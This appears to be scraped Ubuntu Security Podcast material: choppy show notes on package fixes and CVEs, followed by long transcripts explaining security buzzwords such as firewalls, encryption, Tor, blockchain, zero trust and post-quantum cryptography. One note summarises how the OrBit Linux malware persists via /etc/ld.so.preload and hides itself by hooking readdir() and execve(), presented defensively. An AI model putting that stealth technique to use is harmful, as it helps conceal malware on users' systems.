namespace) -> privescMaxQueryDuration
as expecteddebian/patches
directory as well as a corresponding entry for it in the
debian/patches/series
file, and then a new debian/changelog
entryumt
tool which can be used for managing most of these
steps (ie. downloading source packages, adding a new changelog entry,
building the package locally in a schroot, testing the package locally in
a VM etc)WantedBy=multi-user.target
- ie
the multi-user target wants them which ensures they are mounted during
normal boot (equivalent to runlevel 2 - ie. not a rescue shell or
shutdown etc) - so basically any normal boot of the system and they
should be mountedoem-config.target
so it can run first
(to create a new user etc) - and then once it is done it sets the target
to the usual graphical.target
which includes multi-user.target
snapd-desktop-integration
which is used
to try and automatically install theme snaps and the like to match the
system theme - gets started as part of the oem-config
and it then
pokes the snapd.socket
which causes snapd.service
to be started - yet the
snap mount units are not in place, so snapd can’t see any of the expected
snaps, as such it fails to correctly generate their state informationmulti-user.target
but default.target
so they get mounted no matter what
target is being booted intoThis week we’re diving down into the depths of binary exploitation and analysis, looking at a number of recent vulnerability and malware teardowns, plus we cover security updates for FreeType, PHP, ImageMagick, protobuf-c and more.
22 unique CVEs addressed
finfo_buffer
function -
used to get info etc from a binary string - in the example in the
upstream documentation shows using this function to get the MIME info of
a $_POST
parameter - so likely this is being used in a bunch of places on
untrusted data - DoS/RCEIt’s the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
58 unique CVEs addressed
C:\
to create a gitconfig that would contain commands that may then
get executed by other users when running git
themselvesThis week we rocket back into your podcast feed with a look at the OrBit Linux malware teardown from Intezer, plus we cover security updates for cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
52 unique CVEs addressed
cloud-init
was originally a Canonical developed project but is now widely
used by many of the public clouds for configuring cloud images on first
bootTrunc()
or Extract()
DB functions with
untrusted dataldap.schema
to validate untrusted schemas - DoS via
excessive CPU/memory usageLD_PRELOAD
environment variable but instead instructs the dynamic linker via
/etc/ld.so.preload
- this has benefits for the malware since the use of
the LD_PRELOAD
env var has various restrictions around setuid binaries
etc - but this is not the case of /etc/ld.so.preload
meaning all binaries
including setuid root ones are also “infected” via this technique and the
malware payload gets loaded for allreaddir()
the presence of the malware
itself is omitted - same for even execve()
so that if say a binary like
ip
, iptables
or even strace
is then executed, it can modify the output
which is returned to omit its own details/etc/ld.so.preload
- but likely is
via vulnerabilities in privileged internet facing applications - as such,
MAC systems like AppArmor then become very useful for confining these
services so they cannot arbitrarily write to these quite privileged files
etcThis week we bring you part 3 of Camila’s cybersecurity buzzwords series - looking at blockchain, zero trust and quantum / post-quantum security.
Hello listener! Hopefully I set the stage well enough last time that you are back here today for more after getting excited about ending our cyber security buzzword journey with a bang! A journey where we try to understand the meaning of the word behind the buzz in order to better navigate this crazy world of ours! A little bit of an exaggerated description, some might say, but definitely not lacking in inspiration! If you haven’t listened to our previous episodes I highly recommend you do so before proceeding with this one, as preparation will be key to digest what is to come. Oh yes, today is going to be a good one. So let’s get buzzing and let’s get into it, shall we?
Buzzword #7 - which is the first buzzword of today: blockchain. Ah…this one I had to do some serious research on, because even though I hear about it all the time, as you probably do to, I didn’t really know the specifics of how it worked. Anyway, one thing I did know is that this is DEFINITELY a buzzword, one that started trending and gaining traction together with all of the crypto currencies that started showing up out there. And now, I can’t even see a job listing without the good old Blockchain developer position included within the various openings. So, what is the notorious blockchain afterall? Even after researching about this and learning more, it is still a very complicated thing to explain, so please be patient with me if I don’t get all the details right, although I will attempt to be as accurate as possible. Well, let’s board this train and use crypto currencies to explain how blockchains work from a HIGH LEVEL point of view, shall we? Please do note, however, that I did say HIGH LEVEL! I am by no means a block chain/crypto currency expert, as I previously mentioned, and I will only share with you the basics of how this thing works, so that we can really get past the buzzword point of the word, even though we might not reach the true connoseuir point of it. Anyway! Let’s get to it!
Think about a blockchain as being a distributed ledger, which as per dictionary definition is a “a book or other collection of financial accounts of a particular type”. So, this applies to our cryptocurrency example here, and to blockchains being applied to crypto currencies. Just to make that very clear. Each block in the blockchain is like a page of this ledger. What about the chain? We will get to that part soon enough. For our cryptocurrency situation here, let’s consider that each block in our blockchain will contain three important groups of information: data regarding transactions that have been happening for a specific cryptocurrency, a hash for this data and the hash of the block that was generated before it, or, if you’d rather think of it in analogy terms, the hash of the “page” that comes before it. What is a hash, you might ask? To keep it simple, since our topic for today is not hashing, a hash is a fixed size data output that is generated after the processing of some kind of input of variable length. So, for example, a number generated as output for the input data that is a word, which can have from 1 to…a lot of letters. The word is processed such that the position of each letter in the alphabet is used in a sum that starts with value 0. Word ‘blockchain’, in this case, would have a hash of…uh, I don’t want to calculate that, so let’s choose a simpler example. Word ‘aaa’ would have a hash of 3. There, nice and easy…and lazy. Anyway, with a good hash function - a cryptographic hash function - different input data, after processed by a specific hash algorithm, will 99% of the time generate different outputs (which is not the case for our earlier example. You can try to figure out different words that would have the same hash. I’ll leave that as an exercise for you). All of the outputs will possess the same format, which is usually a fixed size sequence of alphanumeric characters, but, more than that, for our case, predicting changes in the hash by analyzing changes in the data is not something easy to do, that is how powerful out cryptographic hash algorithm is. Therefore, we can look at our hashes as if it were the fingerprint of the data it is connected to, if said data were a person able to have fingerprints. Different data equals different fingerprints, and forging a fingerprint, or, in other words, changing your own, is not something you can easily or seamlessly do. Ok…that being said, can you start seeing how our blocks actually constitute a chain? We have various sets of data containing information about financial transactions that are happening. Connected to each set is the hash for that specific set, as is the hash of the set that came before it! So block n will always know who n-1 is, n-1 will know who n-2 is, and so on and so forth. Therefore, if I am an attacker and I want to tamper with the data in the blockchain and say…add a transaction in which I make my worst enemy transfer all of their funds to my account, I can’t just change the data of a block in the middle of the chain without causing havoc for all of the blocks that follow it. To be able to sneakily add my fake transaction into the blockchain, not only would I need to change the data segment of the block which will contain the transaction, I will also need to change the “hash of the previous block” segment for all blocks that come after this block. If I am able to do this instantaneously, say…using a computer, then the problem is solved. But of course it wouldn’t be that easy, or else I don’t think everyone and their mother would be freaking out about how awesome or how safe blockchain is. What is the catch then? The blockchain protocol forces you to provide a proof-of-work every time you wish to add a block to the chain. What exactly does this mean? The blockchain challenges you. It tells you: you cannot add a page to the ledger that is myself unless you solve this very hard puzzle that even a computer will take a humanly noticeable time to solve. This puzzle could be, for example, discovering which set of 100 characters you need to add at the end of the data set to force the block’s hash to start with 10 consecutive zeros. As I previously said, it is not easy to predict what is the output of a hash function given an input when you have a good hash function, so the easiest way to achieve this is by brute forcing it: testing all possibilities until you find something that matches that which you are looking for. Therefore, to add a block to the chain, you must waste some time solving the puzzle, which in turn means that changes made to the middle of the chain cannot propagate instantaneously throughout the tail of the chain. You change a block and you need to change all that follow, but for each block you will take some time solving the puzzle before adding it to the chain. If I were the one listening to this podcast and not the one doing the explaining, at this point I would have two questions: (1) why does this matter if I have full control of the blockchain? (2) Why not add your malicious transaction to the last block instead of adding it to a block in the middle and solve this whole ‘having to update subsequent blocks’ in order to achieve lots of money in your bank account? I don’t know if you have these questions as well, or started asking them after I mentioned it, but what I do know and what I can tell you is that the same answer applies to both of these: blockchain does not rely on a centralized entity to manage it, it is instead distributed. Why should we care? Because then there is never only one person that is in full control of the blockchain (the ledger). Everyone is able to grab a copy of this blockchain, follow which transactions are happening, and include them into a new block. If more than 50% of the peers which participate in building the ledger agree on the new block to be added, meaning, if more than 50% has the same resulting block after including transactions broadcasted and gathered, then this block is officially added to the chain and considered the last block of said chain. Therefore, if I plan to include a fake transaction to the new block that will be added to the chain, I need 50% of the peers that are also listening to transactions and building this new block to agree to include my fake transaction, which might seem simple if you have a lot of friends, but the beauty in having a non-centralized server lies in diversity and on the fact that most people will probably not want to partake in you shady activities of tampering with the blockchain. And even if it is technically possible to do this Mr.Smarty Pants - I see you there in the corner - that will try to bring the argument down by saying “but what if I am super powerful and I CAN convince everyone to do it”, see it as one more thing a potential attacker needs to do, another burdensome task to perform in order to achieve the desired result: change the block AND convince more than 50% of the people in the peer network to go along with it. Have you ever been in any comment section on the Internet? If you have, you know that ‘agreeing on things’ is not something the Internet community does very well. Anyway…more than preventing you from changing the last block, the distributed peer network will also enforce the utility of things such as the proof-of-work. If the blockchain were to be controlled by one single entity, then it matters less if it takes one nanosecond to perform the proof-of-work or if it takes a few minutes. You are a single entity in control of the data, you can eventually catch up with the new blocks that will be added to the chain. Maybe you have 1000 super computers on the side to calculate the blocks that will follow your tampered one, and then the proof-of-work is rendered kind of useless. However, with a distributed network, each peer is trying to solve the puzzle to add the next block to the chain, and once again, you can create however many blocks with fake data you want, if the entire peer-to-peer network disagrees with you on what that block should be, it won’t be added to the chain…and you will need to ask that for each new block you want to add. Other people, some of which might not have been bribed by Mr. Smarty Pants, may end up obtaining the next block in the chain first, and then all of your super computers will have worked for naught, and you would need to start all over again. It’s like participating in an auction…you can make a very high bid…but other people can also do the same. Plus, it’s even worse because everyone participating in the auction is actually checking your bank account to see if you really have the money you claim to have, and if you make a false bid…they can call you out on your lies if they wish to do so. The last question I think remains is: what would make people want to participate in the creation of a blockchain? Seems like too much work and no fun, and choosing people for the job defeats the purpose of not having a centralized entity to manage the ledger, because then, as the verb implies, you get to CHOOSE who will participate, and you can choose whoever you want, and maybe these will be people that will side with you. Well, for crypto currencies I can tell you that the bang is in the buck. The person that is the first to solve the puzzle which allows for inclusion of a new block in the chain is rewarded with a certain amount of crypto currency. Therefore, people want to participate in the blockchain creation and make sure to check that all is well because they will gain something from it. This is what we know as crypto mining. Someone who is crypto mining is trying to earn some digital cash by adding a new block to the crypto currency ledger before other people, and that is how the problem is solved. Give the people something that they want and they shall follow! Well…I think that is enough talk about blockchain, am I right? This is so long that it has almost become a mini-episode inside of a bigger one! So let’s move on and actually go to our next and almost last buzzword of this series of episodes!
Next buzzword, suggested by our one and only Alex Murray, buzzword #8, is zero trust. This one is a hard one for me to explain and I will tell you why: I already have kinf of a zero trust mentality, or at least I have only heard of the “zero trust way” ever since I started studying cyber security. Or maybe it is because the term zero trust was coined very close to the time I was born. Baby me didn’t even have to know the non-zero trust model, because at that time the “never trust, always verify” slogan for this model was already something people were considering. So what is zero trust after all? I think I will begin defining it by saying it is a model. A set of rules, frameworks and principles to take into consideration when setting up your IT infrastructure, one that, as the slogan itself says, trusts no one. Trusts zero persons…zero trust. Get the origin of the name now? As a second way to define it, or as a way to compliment the definition, let us go back and understand what is a non-zero trust model and why the zero trust model was created. A time where the Internet was simpler, and networks were a lot more self contained than they are today. The clouds were only the ones you could see flying around in the sky and WiFi was probably just a weird name someone would give to their pet. When your entire infrastructure is restricted to one single area and your network can only be accessed by those physically present where devices of that network are also physically present at, it is easy to define your headquarters and whoever is in it as being a safe space, with safe people. You only let in people who are allowed to be in there, and people who are allowed to be in there won’t cause any harm to the infrastructure because they are friends, and not foes. Right? In comes the insider threat, that disgruntled employee that decides to do malicious things to the company’s resources and has the means to do so exactly because they are trusted. In comes more technology that allows your infrastructure to exist in more than one physical location, and that allows people to access company resources from areas outside the supposed trusted security perimeter. In come new business models for software products where third party companies are responsible for managing resource from your own company as part of a service provided by them together with their own software. And then the castle walls are no longer enough to protect the kingdom, because the kingdom is no longer just within the castle walls. Zero trust is the model that starts to consider security when the castle walls are no longer enough to prevent the occurrence of cyber attacks, exactly because we can have foes which are inside our own network and because we are expanding our own network and letting it exist beyond what would be a trusted physical location. To mention a few exampĺes…remember our previous buzzword ‘phishing’ from a few episodes back? Well imagine that you have an attacker which is able to successfully trick one of your employees in a phishing campaign they are running. This employee clicks a malicious link and gives this attacker access to the target company’s internal network with their own set of credentials. In a model that is not zero trust, this employee’s user might have a lot of privileges inside the network. Why not let them access the database containing sensitive data? They work for the company, they must be trustworthy! …and yet…now our attacker has access to that same database because they were able to trick someone we trust into giving them privileged information. Notice how we don’t even need to have a disgruntled employee to have an insider threat. It can be the happiest company in the world! All people who work for this company love it and would never harm it…but one of its employees just became an unknowing insider threat because they fell for the tricks of an attacker well trained in the arts of social engineering. Attacks have evolved, so the security model needs to evolve with it, and that is one of the advantages of considering the zero trust model. Another example of a situation where you might need to consider this model: nowadays we can access our work environments from anywhere, so long as anywhere has an available WiFi password for you to use. Maybe you work from home but you are tired of looking at the same boring old view from outside your window. You decide to go work at a local sweets shop for a change of scenery and a change in your lunch menu for that day. The shop has a delightful atmosphere and also has free WiFi. You connect to their network and start working, filled with new energy and joy while you drink a cup of coffee and eat some delicious ‘insert any type of food that you love here’. And yet…ah, once again I say ‘and yet’, and by now you must know some bad news is coming: and yet, this is a free network, meaning that anyone, including attackers can connect to it. You might use a VPN to access your company’s internal network, which encrypts data you are sending through the public network to it, however, you also end up using some applications without connecting to a VPN and sometimes without even having to use encryption. An attacker is sniffing for data, searching for gold, in this sweets shop’s local network, and ends up running across your network traffic and is able to extract some juicy information from it. And once again assets and resources are not kept safe because not enough is being considered when establishing processes and permissions for a company’s network. Yes, you are a trusted user and your device SHOULD be trustworthy, but as many times we have seen, it is not always that theory and practice shake hands and call it a day. IT infrastructures have evolved, so the security model needs to evolve with it, and that is one of the advantages of considering the zero trust model. Oh…wait? Am I repeating myself? Then it must mean I really want you to remember that, don’t you think? Anyway, to close this topic off, I will say that one of the most important principles in the zero trust model is the principle of least privilege, which is a good place to start from if you intend to implement this model in your own environment. The principle of least privilege states that you should only allow a user to have access to resources that they will actually need…no less and no more. No less because otherwise they won’t be able to do their jobs. No more because if you give them more, you are UNNECESSARILY increasing the attack surface for your network. If something does not exist, it cannot be taken advantage of. And that is where I’ll leave it…so you can think about this a little more while drinking your coffee and connecting to that free WiFi network in a sweets shop. Careful!
Give it up to buzzword #9, our last buzzword in the list! Quantum and post quantum security! Let’s finish this off with a big bang, pun intended for the physics lovers out there, and talk about the eerie and wacky thing that is quantum computing. Not really though, because I can definitely assure you that physics is not my jam, and as the name suggests, quantum computing is related to physics and, surprise, surprise, the quantum theory! So…I could say that the next generation of computers will arise in quantum computers, however, it is a little bit more complicated than that, as the quantum computer will be useful to solve a specific set of problems, mainly the ones it was conceptualized to solve. As a bonus, some problems it will be able to solve include a few well known ones which we still can’t efficiently solve with our old regular computers today. However, at the same time problems solved by quantum computers also do not include some of the problems which we already can solve with our old regular computers today. Quantum computers, for example, are not too big on big data, and are limited in their I/O capabilities…so we can keep using regular computers for that. It also wouldn’t be very interesting to use a quantum computer to write blog posts, or create internet memes or even use an app to listen to this awesome podcast: shameless plug. The point is, the quantum computer will not substitute our well known 0s and 1s calculator, it will instead be useful, to solve a few sets of complex problems which require small data sets as input and to model quantum systems…hence the name quantum computers. All of that being said, instead of a son of what we know as the current computer, we could see the quantum computer as a young cousin of our well known 64bit friend. Quantum computing, to perform calculations, instead of simply using the regular transistors which represent a 0 or a 1 at a certain point in time, tries to consider the collective properties of quantum states, such as superposition, interference, and entanglement, to obtain results we wouldn’t be able to with the technology we currently have. Wow, so many complicated words in one sentence! I won’t explain any of those today though, sorry about that. However, what I will explain is that instead of bits, quantum computers use qubits. Qubits can have more than just a 0 or 1 state at a given instant, and this state is actually based on probabilities of results you might have for a certain task. When solving a specific problem, a regular computer needs to test all possibilities individually since bits can only have one state at a given time, while a quantum computer, due to the nature of qubits, is able to go down various paths at once since qubits are able to exist in more than one state at a given time. Of course, to extract useful data from such a different base unit, you need to create algorithms that will appropriately use them and extract results from them, so quantum computer algorithms are not the same as our regular and well known 0 and 1 logic gate algorithms. Yes, I know…I explained a lot of stuff without actually explaining it, and unfortunately…I can’t offer you much more. Even scientists say they don’t fully understand quantum theory, so I can assure that lil’ old me will not be the one to crack that code before them. However, what I can offer you an explanation on why this has become a CYBER SECURITY buzzword. Out of physics and back into cyber security! We might not be using quantum computers to write blog posts about quantum computing itself, however, we CAN use quantum computers to easily and quickly solve problems which would kind of render our current cryptographic algorithms useless! So, the current asymmetric cryptographic algorithms that we use are based on mathematical premises which the quantum computer aims to quickly ignore. One example of that is the ever difficult problem of obtaining the prime factors for very large numbers. Being able to factor a number and extract its prime factors might seem like something simple: 6 equals to 2 times 3. 51 equals 3 times 17, 100 equals 2 times 2 times 5 times 5…and so on. Start actually putting in some large numbers over there and then ask yourself the same question: what are the prime factors of 589.450.367.123.907? Now imagine that with a decimal number that has 617 digits. You might want to buy a lot of pens if you plan on doing that by hand, because I can tell you not even your computer can do that in a viable time frame. You will be living your billionth next life when the computer beeps reminding you that one of your past incarnations wanted to crack that key. The point here is, this is a difficult problem to solve and that is why these algorithms are considered safe and are widely used in encryption protocols for various software out there. In come quantum computers and actually make this an easy and quick problem to solve. Yeah…I know what you are thinking…now what? Now my friends, it is time to focus our efforts on developing post-quantum cryptographic algorithms! And there it is, our actual last buzzword! Have you ever heard the saying “if it ain’t broke, don’t fix it”? Well, in this case, it will be broken, repeatedly, so we do need to fix it! We need to find new ways to encrypt our data, and evolve cryptographic algorithms in order to maintain confidentiality of this data when faced with possible future quantum computer attacks. And yes, I know that quantum computers will not be easily accessible to every single person on the planet, at least in the beginning, as I also know that quantum attacks won’t be your everyday script-kiddie daily attack of choice. That does not mean, however, that we shouldn’t be preparing for a reality we are certain will exist in the future. Better safe than sorry. Better still encrypted than sorry!
Well friends, those are the buzzwords I have for you. I created this list based on words I know and am quite tired of seeing everywhere, and also based on suggestions given to me by the Ubuntu Security team! However, I do know that these are not the only ones, and that these will definitely not be the last words we extensively overhear regarding the cyber security world. As we all know, technology is ever changing and ever evolving, and in suit, the buzzwords shall follow. Maybe in a few years you can do a check-in, go back to this episode and see what has changed and how you might see some of these buzzwords in a different light once they have lost their buzz and new queen bees have arrived to torment us in every cyber security advertisement ever! Feel free to share your thoughts and share words I might have missed that you think are cyber security buzzwords in any of our social media channels! I hope you enjoyed this series, for now, I bid you all farewell, and until next time! Bye!
From the deep-web to encryption we decode more cybersecurity buzzwords, plus we cover security updates for Squid, Vim, the Linux kernel, curl and more.
16 unique CVEs addressed
Hello listener! Welcome to part 2 of our cyber security buzzword series! Last episode we talked about ransomwares, botnets and phishing attacks! Let’s keep the bees happy and continue on in this buzzing journey of better understanding what is the meaning behind the word and turning the “bzzzzzzzzzz” into an “aaaaah, I see” instead! 039 If you haven’t listened to the last episode I highly recommend you do it before you proceed with this one, but hey, that is your choice. I don’t want to take too long with this introduction, so, for those who are already in for this ride, without further ado, let’s jump in! Our first word of today and the fourth overall…we’ve talked about it before, and we are talking about it now once again… buzzword #4 is the one and only firewall! If you listened to the episodes involving the Ubuntu hardening topic, you already know that our dearest friend firewall is one way to keep your network safe because it allows you to filter and possibly block incoming and outgoing traffic in your network. Through use of a firewall you can define that users in your network can’t access a specific website, or you can keep connections coming from a specific IP address from ever being established with these same users. It’s an important job the one done by a firewall, however, it is not 100% hacker proof. A firewall does what it needs to do well, but it won’t save you from yourself, for example, if you decide to become the victim of every phishing campaign happening out there. So…do you see that buzzword right there: “phishing”? That is why I recommended you listen to the last episode, because I explain what is phishing THERE. Moving on, if e-mail service is allowed by the firewall, a hacker can try to get to the network through it, and in that case, my friend, you are the weakest link, as said hacker is expecting you to make the mistake that will allow them passage when the firewall will not do so through other ports or services in the network. Don’t expect a wall to protect your network if your staff is handing out keys to the building’s backdoor to anyone that mentions that they work there!!! I am adding firewalls here on this list because ever since the dawn of time…or at least the dawn of my time…I see the word firewall being thrown around in television shows, in presentations that want to nudge cyber security a little bit, and even on the thoughts of people who are wondering “How did I get infected with malware, I have a firewall!!!”. So…yeah. Unfortunately the buzzword became a universal term used to describe all software and defensive techniques, even if they are not all the same. To make an analogy, a firewall is one fruit amongst the huge selection of different fruits that exist in this beautiful world, but people insist on calling all fruits ‘firewalls’. I am sure you can imagine a situation where I give you a lime and call it an apple, and I am sure that in your imagination you are not too pleased about the result once you bite into that fruit expecting one thing and instead getting another. You might feel a little ‘sour’ should I decide to do such a thing. Haha, get it? Bad jokes aside, it’s important to understand what a firewall really is and what it can actually do for you in terms of protecting your network. Not all attacks are the same, so not all attacks will be stopped by a firewall. If you go beyond the buzzword and beyond the beautiful wall and fire icon - which at this point could be called a buzzicon - you start to actually build a defense strategy that makes sense and is efficient for your network, one that will include a firewall, BUT will not expect it to defend the network, cook and wash your clothes all at the same time. Therefore, the next time your hear someone in a show mentioning that they have breached 50% of the firewall, remember your training, remember what a firewall actually is, and remember that if you are able to bypass the firewall, you either did it 100% or you simply didn’t, and then relax and laugh a little, because you used your knowledge to actually build a defense strategy that even if an attacker bypasses the firewall by 100%, you are able to prevent an attack from actually being successful with the help of your other layers of defense. You fought valiantly firewall friend, but not all threats are avoidable by you, and we know that now. We also know now that movie security in movie networks are probably awful, because they seem to only use a firewall to defend very important data, and the firewall is most likely broken, being only 50% bypassed and all…geez, get a grip, hollywood, or hacking might become TOO easy for those imaginary hackers.
Buzzword #5: encryption…encrypting…encrypted…encrypt. This buzzword is also one that I think can be considered a long-living buzzword. Data encryption suffers from the same problem as firewalls in the sense that people see it as a solution to all of their problems. Oh…and movies also like to use the word a lot. “If my data is encrypted it is completely safe”. Right? Wrong. What is encryption then, and what purpose does it serve? When you encrypt your data, you are actually just encoding it. Transforming it in such a way that whatever information is actually imbued within it cannot be extracted because the data no longer represents something that can be understood by a potential snooper of that data. One encrypted character a day keeps the snooper away, or at least that is the goal anyway. The main purpose of encryption is to maintain data confidentiality, or, in other words, to prevent an unauthorized party from getting access to the data that is going to be encrypted. Therefore, encryption is a technique that will serve the purpose of encoding data in such a way that it loses its meaning to whoever is not authorized to know it. Who are the ones authorized? Those that have the decryption key…and if that key is stolen or shared with someone it shouldn’t be…well then you can say goodbye to your expected confidentiality, as this new someone can now decode the data and interpret it as you would. I guess what annoys me a little bit about this buzzword is the fact that it is used to make people feel completely safe even when the situation does not necessarily guarantee this. The most simple example I can think of is VPNs. I see advertisements for those all the time, and in these advertisements people mention how VPNs will help you stay safe from hackers when you are browsing online…and that is not completely true. It depends on what the hacker is doing. If a hacker is trying to track you and figure out what you are doing in the internet, that is, they are trying to snoop on your browsing activities, then yes, a VPN, which will help you mask your tracks by adding a layer of encryption to your traffic and acting as a middle man in your communication with your destination, will indeed protect you. Think of it as sending an encrypted letter to an intermediary courier. Only you and the courier know the decryption key and so anyone that tries to intercept the letter and does not have this key will be unable to do anything about it. They don’t know who is the actual destination of the letter nor do they know what is the purpose of the letter, all they know is that the courier will receive it and send it to the actual destination. Encryption keeps your communication confidential. Once it gets to the courier, the courier decrypts it and then sends it to the actual destination and your snooper can’t know it is from you because the courier is also sending and receiving data from a bunch of people, and that courier has promised secrecy to you, meaning, it promised it won’t tell others which is your letter. Anyway, now think about the situation where you willingly decide to access a malicious website through a VPN. There is no encryption that will save you from your bad choices here. An encrypted conversation with an attacker is still a conversation with an attacker, and an encrypted malware sent to you through your VPN tunnel will still execute in your machine should you tell it to. So once again I tell you, use encryption but know its purpose! It is not because a website is HTTPS, or, in other words, it is not because a website has that little lock in the top left corner, that you are protected from all evil lurking on the internet. All it means is that data you send to that website’s server will be sent to it encrypted. This in turn means that your login credentials won’t be out in the open, being sent in clear text through the network, free to be accessed by anyone that chooses to sniff the data in any point of the path from source to destination. They will be encrypted, and whoever comes across this data in transit won’t be able to know the true contents unless they have the decryption key, which is shared between you and the server only. However, you can decide to send encrypted credentials to an attacker as well. Malicious websites can be HTTPS. In fact, attackers take advantage of the fact that people blindly trust HTTPS websites because they are “encrypted” and make fake HTTPS bank pages in order to steal credentials. Phishing attacks, remember those? So here we have a situation where the buzz in the word is being harmful for those that don’t actually try to understand the meaning behind it. When you want to make sure a website is safe, not only check for the tiny lock in the top-left corner of the browser, also do check if the website’s certificate actually identifies that page as being authentic, as being owned and provided by the entity that you believe it to be. So…yeah. I guess final thoughts on this once again are: encryption is fine when you don’t forget to combine….it with other security measures. I wanted to make a cool rhyme, but that didn’t work out. Oh well…onto the next buzzword!
Buzzword #6: the deep web. Ooooh, spooky! Once again we are in “buzzword because of the movies” territory. Hacker, firewall, encrypted data, network breach, deep web. Oh, and a guy wearing a black hoodie. The cliché buzzword we see getting thrown around every time someone wants to talk about cyber security and sound mysterious while doing it. I mean…I can’t really blame them, as it is human nature to enjoy mysteries and to want to solve them. So, I guess if you are in the entertainment industry, throwing out the word “deep web” around is indeed one of the ways to go. However, if you are an IT professional, blindly trusting that what you see in movies is how things actually work is definitely not. Does the deep web contain mysterious websites and crazy mind bending information? Yes. Is it a blackhole where only the most courageous may enter and the most bizarre may stay? No. No! A bunch of the websites you have in the surface web also exist in the deep web! If you want, you can do your regular browsing but using the roads - let’s call them that for now - of the deep web instead. All you have to do is download the software tool that will allow you to access it. The most well known tool to do so is the Tor browser, which will give you access to the Tor network, where lot’s of deep web websites are hosted. So let’s talk a little bit about the Tor network and try to understand what is the oh-so-mysterious deep web and why you can’t access it by simply typing “Take me to the deep web” on a search engine in your regular browser. Think about the Internet as being the entire planet. Earth as you know it. Everyone and everything we know and can access is inside the planet…and for the smarty pants that will try to say “but what about space travel???”, don’t be a downer and destroy my analogy. Use your imagination and PRETEND like all we know is inside the planet only, which is the ONLY thing we have access to. The planet is like the entire Internet. Now imagine all of the roads on the planet. You can drive through them and go anywhere you want, the same way your data can flow through the Internet and reach several destinations which will provide you with services such as web browsing and e-mail sending. Consider now, however, that a group of servers, or, to stick to the analogy, a group of destinations for road trips, decide to bundle together and create their own underground secret routes and make themselves and their services accessible only to travelers which use those secret routes. The regular roads that would lead you to them are destroyed and there are now a few single regular roads that lead to the entry-points of the underground tunnels. Anyone can enter the underground tunnels if they wish to and use the tunnels to reach those “secret” destinations, as can anyone download a Tor browser and find websites which are deb web or even darknet services. However, if you want to reach your destination you must use the tunnel, and you can no longer use maps to reach this destination, since in the underground tunnels they provide you with no maps as they do in the surface roads. No maps so that the destinations remain well hidden within this secret underground road network, and so that they can “change their location” or “stop existing” whenever they wish to do so. No records means no tracking. When entering the underground tunnels you set up three intermediate tunnel only destinations that will help you reach your desired end point, let’s consider those toll booths. The first one is where you will always stop at the beginning of your journey, the second one will connect you to the last one, which in turn will be the one that will finally tell you which road to follow to access the destination which will provide you with the service you wish to access. Think now that these intermediate points recognize you by your car color. A very specific color you and each toll booth attendant have previously decided on, the moment you knew they would be your intermediate stops. So the first point recognizes a red car, the second a blue car, and the last a green car. I am using simple colors here, but to amuse your own imagination, you can think of it as a very specific shade of red that cannot be replicated by anyone else, meaning it will identify you uniquely to that specific toll booth. Same goes to the blue and to the green. Before passing through your underground toll booths you paint your car green, then blue and then red. When you get to the first mark, the toll booth guard recognizes the red hue of your car and identifies you as a valid passenger. It removes the red hue and you tell it your next toll booth stop. It forwards you in that direction, meaning it shows you the way to the blue toll booth. You go to the blue tollbooth and the same thing happens. It recognizes the blue hue, removes it and sees that you are going to the green toll booth, and it directs you there. Finally, when you reach green they do the same, but they finally send you to your final destination. Notice that this allows you to stay anonymous because you got in in a red car and got to your destination in a green colored car. The red toll booth does not know your final tollbooth was green, knowing only you went to blue, and the green does not know your starting point was red, knowing only you came from blue. Blue does not know your starting point nor you final destination, knowing only that you came from red and left for green. Going back to that final destination: your final destination can be outside of the underground tunnels and back on the main roads. You used the underground tunnels just so that people who see you get in through the tunnels in a red car don’t follow you and don’t know where you got out. Your final destination, however, can also be inside the tunnel network. If that is the case, you will never go to the actual destination, because underground tunnel services establish an intermediate rendezvous point for communication and service offering instead of letting you reach them at their actual location. Knowing the secret name of the service, you are able to obtain information on what places are set as these rendezvous points. So…leaving the analogy for a little bit…this is basically what the Tor network is and what at least part of the deep web is. The Tor network is an established network inside the internet. The secret underground roads inside of the planet’s entire road network. It still uses roads, meaning, it still uses IP addresses and establishes communication between devices using regular means in layers under the application layer itself. However, it defines a private communication method within the public internet. Anyone can download a Tor browser and access Tor websites, which would be part of the deep web websites, however, to do so, you need to know the website’s address in the format that will be recognized in the Tor network. Unlike the surface web where you register the mapping of your website name and the IP address of the server that will host that website in order for people to be able to find it without having to memorize a complex number to do so - thank you DNS -, in the Tor network what you will know is the name of the onion service and the location where this service meets clients wishing to access it. Tor nodes, our toll booths, can then route you to this destination, where you can introduce yourself to the server and then set a rendezvous point which is where the rest of the communication between you will actually happen. In the Tor network, it is not as simple as the definition of an explicit mapping that says “oh, you want to get to this place? Here is the address!”. Nope. Here, everything is done covertly and secretly. You have a meeting place to define the definitive meeting place. So maybe it is a little bit mysterious after all. I’ll give the movies that. Of course you can use the Tor network, our secret underground tunnels, to access a regular surface web website if you want to. It is not necessary, but a lot of people do it because it allows for anonymous browsing. Our underground tunnels won’t allow for identification of who sent a message that is reaching a specific destination, remember the whole car painting process and the colorful toll booths? Well, in technical terms, Tor uses layers of encryption and intermediate proxy nodes in order to stop someone snooping from knowing who is the original sender of a message arriving at a certain destination. ENCRYPTION being used to assist in keeping anonymity and to maintain confidentiality of the data that is being transferred by whoever is using the Tor network. So yeah…kind of a long explanation, but demystifying it, this is what the deep web is: encryption, intermediary nodes, regular websites, creepy websites, and lots of bureaucracy to get you to your final destination. Oh, wait…that’s just part of it, since Tor is only one of the many underground tunnel networks that exists out there. There are others with different rules, different entry regulations and different functionalities and purposes in general. I decided to tell you about how the most famous one of these secret networks within the network works so that you can get the genral iceberg idea of it. However, lady Internet is a vast place, filled with opportunity to create and embed, so secret networks which can not have their services accessed through the regular WWW URL are plenty out there, all you need is the will and the knowledge of the way to explore it! Oh, and the permission as well. I am not condoning you committing a crime here.
Anyway, I think that is enough of me talking for one episode. Tune in for next time where we will talk about our last three buzzwords for this series, which I might add, are three giants…all of them suggested by my Ubuntu Security Team peers of course! Feel free to share your thoughts on today’s episode and buzzwords in any of our social media channels, I would love to hear what you have to say about it! For now, I bid you all farewell and until next time! Bye!
This week Camila dives into the details on some of the most prolific buzzwords flying around the cybersecurity community, plus we cover security updates for BlueZ, the Linux kernel, Intel Microcode, QEMU, Apache and more.
58 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 87.1 | 87.2 | 87.1 | — |
aws-5.4 | — | — | 87.1 | — | — |
